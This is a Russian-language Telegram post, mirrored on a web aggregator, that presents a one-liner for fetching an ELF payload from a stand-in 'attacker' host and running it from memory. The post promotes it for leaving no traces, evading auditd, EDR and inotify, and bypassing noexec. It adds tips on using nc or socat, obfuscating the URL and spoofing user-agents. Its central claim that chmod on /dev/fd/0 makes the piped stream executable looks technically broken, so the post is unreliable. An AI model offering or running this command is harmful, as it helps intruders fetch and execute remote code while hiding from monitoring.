HACKPROGLIB Telegram 4527
tgoop.com » United States » Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность » Telegram web » Post 4527
Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность
💾 Запуск бинарника напрямую из памяти

Если нельзя писать на диск или не хочется светиться в логах — можно выполнить ELF-бинарник напрямую из памяти, минуя файловую систему:


curl http://attacker/payload.elf | bash -c 'chmod +x /dev/fd/0 && /dev/fd/0'


Как работает:

— curl тянет бинарь по HTTP

— /dev/fd/0 — спецфайл, указывающий на поток stdin

— chmod +x делает поток исполняемым

— /dev/fd/0 сразу запускается как исполняемый ELF

⚠️ Бинарник не сохраняется и не появляется на диске даже временно.

Полезно для:

Разведки без следов (auditd, EDR, inotify не ловят файл)

Обхода ограничений записи (tmp, noexec)

Тестов persistence без артефактов

CTF и отработки техник memory execution

💡 Лайфхаки:

— Заменить curl на wget -qO-, socat, nc, httpie

— Альтернатива: /proc/self/fd/0

— Можно обфусцировать URL, использовать TLS и подмену юзер-агента

🐸 Библиотека хакера

#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9👍3
www.tgoop.com/hackproglib/4527
1.22K viewsedited  



tgoop.com/hackproglib/4527
Create:
Last Update:

💾 Запуск бинарника напрямую из памяти

Если нельзя писать на диск или не хочется светиться в логах — можно выполнить ELF-бинарник напрямую из памяти, минуя файловую систему:


curl http://attacker/payload.elf | bash -c 'chmod +x /dev/fd/0 && /dev/fd/0'


Как работает:

— curl тянет бинарь по HTTP

— /dev/fd/0 — спецфайл, указывающий на поток stdin

— chmod +x делает поток исполняемым

— /dev/fd/0 сразу запускается как исполняемый ELF

⚠️ Бинарник не сохраняется и не появляется на диске даже временно.

Полезно для:

Разведки без следов (auditd, EDR, inotify не ловят файл)

Обхода ограничений записи (tmp, noexec)

Тестов persistence без артефактов

CTF и отработки техник memory execution

💡 Лайфхаки:

— Заменить curl на wget -qO-, socat, nc, httpie

— Альтернатива: /proc/self/fd/0

— Можно обфусцировать URL, использовать TLS и подмену юзер-агента

🐸 Библиотека хакера

#буст

BY Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность


Share with your friend now:
tgoop.com/hackproglib/4527

View MORE
Open in Telegram


Telegram News

Date: |

Don’t publish new content at nighttime. Since not all users disable notifications for the night, you risk inadvertently disturbing them. Public channels are public to the internet, regardless of whether or not they are subscribed. A public channel is displayed in search results and has a short address (link). Telegram channels enable users to broadcast messages to multiple users simultaneously. Like on social media, users need to subscribe to your channel to get access to your content published by one or more administrators. Find your optimal posting schedule and stick to it. The peak posting times include 8 am, 6 pm, and 8 pm on social media. Try to publish serious stuff in the morning and leave less demanding content later in the day. "Doxxing content is forbidden on Telegram and our moderators routinely remove such content from around the world," said a spokesman for the messaging app, Remi Vaughn.
from us


💾 Запуск бинарника напрямую из памяти

 Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность TG
web: 4527
Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность.Telegram web
Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность Telegram TG Channel
Telegram Updated:
Telegram Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность
FROM American